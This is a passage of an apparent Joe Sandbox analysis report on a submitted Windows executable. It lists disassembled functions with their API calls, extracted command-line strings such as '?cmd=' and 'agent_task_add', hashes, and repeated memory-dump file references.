                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                      • Opcode ID: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                                                                                                      • Instruction ID: 2a005e2a26b7ca0d99b70be6941c5cde8c8a031a6340c38cdbef76149252a918
                                                                                                                                                      • Opcode Fuzzy Hash: cf9044d909a80a9cd1ff4a26ba37dc503059a3b1c36592aa200a094437635a16
                                                                                                                                                      • Instruction Fuzzy Hash: BE016571544704DFD720AF66D846789BBE0BF50318F10854FE8A5563D1CBB8A680CB19
                                                                                                                                                      Function 00405540 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 232stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?cmd=,-000000F0,00000000,00424AC8,000000FF,?,0040530B,00000001,00000000,00000000,?,0000000D,?,00000001), ref: 004055A3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                      • String ID: '%s' is not a recognized command$'%s' is not a recognized command Id$'%s' is not a valid command line$?cmd=$Failed to set parameters for command %s. %s
                                                                                                                                                      • API String ID: 1659193697-3601394813
                                                                                                                                                      • Opcode ID: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                                                                                                      • Instruction ID: 798868e04bc199de5828f86eb8defdc8c90eec0ebd6dcdaa2e18cfd21095d804
                                                                                                                                                      • Opcode Fuzzy Hash: a6b82354fa24fe632ef5d29c7df6978a5f1a493634a230fd05eafbcfe10ffe30
                                                                                                                                                      • Instruction Fuzzy Hash: 3C81F371A006059FCB10DFA8C885A9FB7B1EF44324F24466EE855A73D1DB38AD01CFA8
                                                                                                                                                      Function 004113D0 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • AllocConsole.KERNEL32(00000000,?,?,?,?,?,?,?,004118D1,00404392,?,?,?,00000004,00000001,00403CC0), ref: 004113E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocConsole
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4167703944-0
                                                                                                                                                      • Opcode ID: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                                                                                                      • Instruction ID: f94551d0b180acb98bca3c25dca5fd75217ec5d2b91c6eebe384a79b1f0ad324
                                                                                                                                                      • Opcode Fuzzy Hash: 76ecdf4abb5c9d6e4730d336aa4ed42852a12889e33b42b6854653d10d150544
                                                                                                                                                      • Instruction Fuzzy Hash: 28217E73E4031467DF20A6752C43BEB3348AB45715F04069AFF18EB2C1EA5D988683ED
                                                                                                                                                      Function 00415E97 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00415EA3
                                                                                                                                                        • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                                                                                                        • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00415EC3
                                                                                                                                                      • __lock.LIBCMT ref: 00415ED3
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00415EF0
                                                                                                                                                      • _free.LIBCMT ref: 00415F03
                                                                                                                                                      • InterlockedIncrement.KERNEL32(004304F8), ref: 00415F1B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                      • Opcode ID: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                                                                                                      • Instruction ID: 666f727ee5236ad751bbd60f5143e2be873cd4defde857ce3df78ec67e0369fb
                                                                                                                                                      • Opcode Fuzzy Hash: 64aacbd154439050355b0105d418cfbe868bba507bb6dff041487b75a4529be2
                                                                                                                                                      • Instruction Fuzzy Hash: 1301C031E05B19EBDB21AB6598467DA73A0BF84714F15011BEC10A7381DB3CAAC2DBDD
                                                                                                                                                      Function 00403560 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 231COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C6FB9493,00000000,?,00000001), ref: 004035A3
                                                                                                                                                      • _wcsrchr.LIBCMT ref: 004035B6
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000001), ref: 004035CE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectoryFileModuleName_wcsrchr
                                                                                                                                                      • String ID: log$register
                                                                                                                                                      • API String ID: 603228450-1130157763
                                                                                                                                                      • Opcode ID: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                                                                                                      • Instruction ID: 107d6a80d698f550d366be7666382815e05da8c8a50b4613ac0a3b839ff3cd87
                                                                                                                                                      • Opcode Fuzzy Hash: 08ef2cd8552d64b021087630f6c97d8c3824145298a4f84e84184ce598c96753
                                                                                                                                                      • Instruction Fuzzy Hash: FF91E3B1601605AFC714DFA8CC45B9AB7B9FF88324F1482A9E4199B2D1DB34EE44CF94
                                                                                                                                                      Function 00405400 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AB3
                                                                                                                                                        • Part of subcall function 00402A90: __wcsicoll.LIBCMT ref: 00402AEF
                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00405515
                                                                                                                                                      Strings
                                                                                                                                                      • agent_task_add, xrefs: 00405435
                                                                                                                                                      • taskId=TASK_LAUNCH_VAULT&allowDuplicates=1, xrefs: 004054AB
                                                                                                                                                      • list<T> too long, xrefs: 00405510
                                                                                                                                                      • '%s' is not a recognized command Id, xrefs: 0040546F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wcsicoll$Xinvalid_argumentstd::_
                                                                                                                                                      • String ID: '%s' is not a recognized command Id$agent_task_add$list<T> too long$taskId=TASK_LAUNCH_VAULT&allowDuplicates=1
                                                                                                                                                      • API String ID: 738070571-3830114783
                                                                                                                                                      • Opcode ID: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                                                                                                      • Instruction ID: 2877e8e1ee730d82884497b78d13055ad23c509a160683405d2cfcdd003b873f
                                                                                                                                                      • Opcode Fuzzy Hash: 73d2313ef4ca0c44209152350d997199626b350e51a2dc92e81e401f3a4541fc
                                                                                                                                                      • Instruction Fuzzy Hash: 8441C3716006059FC704DFA8D941AAAB7B4FF85324F10836EE426A73D1D734AE40CF94
                                                                                                                                                      Function 00413B9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _malloc.LIBCMT ref: 00413BB6
                                                                                                                                                        • Part of subcall function 00415170: __FF_MSGBANNER.LIBCMT ref: 00415189
                                                                                                                                                        • Part of subcall function 00415170: __NMSG_WRITE.LIBCMT ref: 00415190
                                                                                                                                                        • Part of subcall function 00415170: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00416F22,?,00000001,?,?,0041B525,00000018,0042D5F0,0000000C,0041B5B5), ref: 004151B5
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00413BEB
                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00413C05
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                                                                                      • String ID: xsB
                                                                                                                                                      • API String ID: 1414122017-962849395
                                                                                                                                                      • Opcode ID: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                                                                                                      • Instruction ID: 6a8bc27a46bf097875d484f5a0b5e3f95a16b6a6685c49e19060bb533e89cc82
                                                                                                                                                      • Opcode Fuzzy Hash: 71bb43113b03fda9e75c22da8486a42dfa7a218c335d59594391c918980907c1
                                                                                                                                                      • Instruction Fuzzy Hash: 7AF0F975604215AACB00EF55EC02AEDB6A46F40758F50006FFC05A61E1EB7CAB84864D
                                                                                                                                                      Function 00404FD0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(eadcommand:,?,00000001,00403CC0,00000000,00000001,00000001,00000001), ref: 00405090
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                      • String ID: %20-$?cmd=$Could not find '%s' in command line: '%s'$eadcommand:
                                                                                                                                                      • API String ID: 1659193697-2334872083
                                                                                                                                                      • Opcode ID: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                                                                                                      • Instruction ID: d20ee6b8477c0c243330d9cee297807aef4a887e61db8673c5507edcc9854c4b
                                                                                                                                                      • Opcode Fuzzy Hash: 2f1ba494e88771337f45c52a1bdd7358bb1a852e26cadc68df8db2b6343d09fe
                                                                                                                                                      • Instruction Fuzzy Hash: 91D1B471A00A059FCB04DF68C885B5FB7A4FF85324F14826EE825AB3D1D778A905CF98
                                                                                                                                                      Function 00416618 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __getptd.LIBCMT ref: 00416624
                                                                                                                                                        • Part of subcall function 00416841: __getptd_noexit.LIBCMT ref: 00416844
                                                                                                                                                        • Part of subcall function 00416841: __amsg_exit.LIBCMT ref: 00416851
                                                                                                                                                      • __getptd.LIBCMT ref: 0041663B
                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00416649
                                                                                                                                                      • __lock.LIBCMT ref: 00416659
                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041666D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                      • String ID:
